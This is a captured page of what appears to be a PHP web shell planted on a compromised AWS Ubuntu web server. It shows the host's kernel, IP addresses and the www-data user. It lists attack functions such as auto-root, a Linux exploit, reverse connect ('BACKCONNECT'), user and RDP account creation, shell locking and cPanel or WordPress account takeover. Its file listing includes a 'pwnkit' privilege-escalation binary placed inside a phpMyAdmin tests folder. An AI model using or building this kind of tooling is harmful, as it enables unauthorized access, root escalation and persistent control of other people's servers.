Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.138.37.184
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
tests /
javascript /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
functions.test.ts
660
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sql.test.ts
466
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sql.test.ts
/* eslint-env node, jest */ import 'phpmyadmin/sql'; describe('SQL', () => { test('test URL encode', () => { const urlDecoded = window.Sql.urlDecode('phpmyadmin+the+web+%C3%BB%C3%AF'); expect(urlDecoded).toEqual('phpmyadmin the web ûï'); }); test('test URL decode', () => { const urlEncoded = window.Sql.urlEncode('phpmyadmin the web ûï'); expect(urlEncoded).toEqual('phpmyadmin+the+web+%C3%BB%C3%AF'); }); });
Close